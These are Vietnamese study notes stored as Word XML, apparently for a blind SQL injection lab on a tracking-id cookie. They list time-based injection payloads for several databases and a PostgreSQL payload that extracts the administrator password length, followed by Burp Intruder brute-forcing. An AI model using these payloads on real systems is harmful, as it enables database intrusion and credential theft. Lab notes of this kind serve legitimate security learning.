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9F496" w14:textId="2BE45258" w:rsidR="002F49FE" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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t>Lỗ hổng blind nằm ở trace id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137B4A3" w14:textId="0DEEA5CB" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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t>Kiểm tra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175B20B5" w14:textId="39EE543E" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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t xml:space="preserve">+Tiêm đk để ứng dụng phản hồi khác nhau </w:t>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thất bại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0722A66B" w14:textId="6002A526" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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t xml:space="preserve">+Tiêm đk để kích hoạt lỗi của csdl </w:t>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thất bại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60867AC5" w14:textId="38709D41" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kích hoạt sự chậm trễ thời gian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D8D92" w14:textId="613CF467" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A78EF80" w14:textId="1AE79E85" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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t>Đầu tiên, phải kiểm tra loại cơ sở dữ liêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B917AD" w14:textId="51CE2D00" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA13B14" w14:textId="07B25E54" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029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t>Cách fuzz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D98053" w14:textId="45A07997" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029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656D73" wp14:editId="1075A68F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-81024</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>141758</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6215605" cy="4375230"/>
                <wp:effectExtent l="0" t="0" r="762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5605" cy="4375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B9330" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-6.4pt;margin-top:11.15pt;width:489.4pt;height:34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WSTwIAAO0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1vGjEQvVfqf7B8b5YlQFrEEqFEqSpF&#13;&#10;CUpS5ex4bVjV63HHhoX++o69y0JTTlUvxuOZNx9v3zC73tWGbRX6CmzB84sBZ8pKKCu7Kvj3l7tP&#13;&#10;nznzQdhSGLCq4Hvl+fX844dZ46ZqCGswpUJGSayfNq7g6xDcNMu8XKta+AtwypJTA9YikImrrETR&#13;&#10;UPbaZMPBYJI1gKVDkMp7er1tnXye8mutZHjU2qvATMGpt5BOTOdbPLP5TExXKNy6kl0b4h+6qEVl&#13;&#10;qWif6lYEwTZY/ZWqriSCBx0uJNQZaF1JlWagafLBu2me18KpNAuR411Pk/9/aeXD9tktkWhonJ96&#13;&#10;usYpdhrr+Ev9sV0ia9+TpXaBSXqcDPPxZDDmTJJvdHk1Hl4mOrMj3KEPXxXULF4KjvQ1Eklie+8D&#13;&#10;laTQQwgZxwbSLeyNij0Y+6Q0q0oqOUzopA11Y5BtBX1VIaWyYRK/JOVL0RGmK2N6YH4OaELegbrY&#13;&#10;CFNJMz1wcA74Z8UekaqCDT24rizguQTlj75yG3+Yvp05jv8G5X6JDKFVrHfyriIS74UPS4EkURIz&#13;&#10;rV14pEMbaAoO3Y2zNeCvc+8xnpRDXs4aknzB/c+NQMWZ+WZJU1/y0SjuSDJG46shGXjqeTv12E19&#13;&#10;A8R/TgvuZLrG+GAOV41Qv9J2LmJVcgkrqXbBZcCDcRPaVaT9lmqxSGG0F06Ee/vsZEweWY0iedm9&#13;&#10;CnSdkgKJ8AEO6yGm7wTVxkakhcUmgK6S2o68dnzTTiXRdPsfl/bUTlHHf6n5bwAAAP//AwBQSwME&#13;&#10;FAAGAAgAAAAhAPjBm17iAAAADwEAAA8AAABkcnMvZG93bnJldi54bWxMj01PwzAMhu9I/IfISNy2&#13;&#10;NK1UWFd3GkyDK4yva9aEtqJxqibdyr/HnOBiybL9+nnKzex6cbJj6DwhqGUCwlLtTUcNwuvLfnEL&#13;&#10;IkRNRveeLMK3DbCpLi9KXRh/pmd7OsRGcAiFQiO0MQ6FlKFurdNh6QdLPPv0o9OR27GRZtRnDne9&#13;&#10;TJMkl053xB9aPdj71tZfh8khTPXD3UczbJ92+4wepVcr9/ZuEK+v5t2ay3YNIto5/l3ArwPzQ8Vg&#13;&#10;Rz+RCaJHWKiU+SNCmmYgeGGV52x4RLhRKgNZlfK/R/UDAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#13;&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#13;&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#13;&#10;CAAAACEAYbllkk8CAADtBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#13;&#10;AAYACAAAACEA+MGbXuIAAAAPAQAADwAAAAAAAAAAAAAAAACpBAAAZHJzL2Rvd25yZXYueG1sUEsF&#13;&#10;BgAAAAAEAAQA8wAAALgFAAAAAA==&#13;&#10;" fillcolor="white [3201]" strokecolor="#70ad47 [3209]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C7172" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>MySQL (string concat and logical ops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12622170" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' and sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F850D" w14:textId="4DC96E8C" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' &amp;&amp; sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2038EA" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B341FC8" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>PostgreSQL (only support string concat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B40D08" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' || pg_sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64A96B" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC472F1" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>MSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A782C" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' WAITFOR DELAY '0:0:10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60E3B0" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0B9727" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB28032" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECCD83" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33950224" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767FF9F7" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A55F3C" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B42D78" w14:textId="7D021306" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029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t>1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A0DAB8" w14:textId="5CF3A354" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CDA93B" w14:textId="77777777" w:rsidR="006D4029" w:rsidRPr="006D4029" w:rsidRDefault="006D4029" w:rsidP="006D4029">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24890484" w14:textId="7C77CC5A" w:rsidR="00BF4B8F" w:rsidRPr="006D4029" w:rsidRDefault="00BF4B8F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t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidR="006D4029" w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">|| (SELECT pg_sleep(10)) - -     (phải nối chuỗi ) </w:t>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6BCAF" w14:textId="42499A03" w:rsidR="00B96655" w:rsidRPr="006D4029" w:rsidRDefault="00B96655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t>Khai thác thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA64B85" w14:textId="389EC67F" w:rsidR="00B96655" w:rsidRPr="006D4029" w:rsidRDefault="00B96655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t xml:space="preserve">Payload: '|| (SELECT CASE WHEN (LENGTH(password)=20) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE username='administrator') -- </w:t>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mk có 20 kí tự</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E31BF6B" w14:textId="57466716" w:rsidR="00B96655" w:rsidRPr="006D4029" w:rsidRDefault="00B96655">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D4029">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chạy burp intruder để tìm mk.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B96655" w:rsidRPr="006D4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F1"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004843CD"/>
    <w:rsid w:val="006D4029"/>
    <w:rsid w:val="00B96655"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF4B8F"/>
    <w:rsid w:val="00D4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4DB305"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F7A340E8-C454-8142-B427-65FD3FB7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2022-09-28T11:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-29T23:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>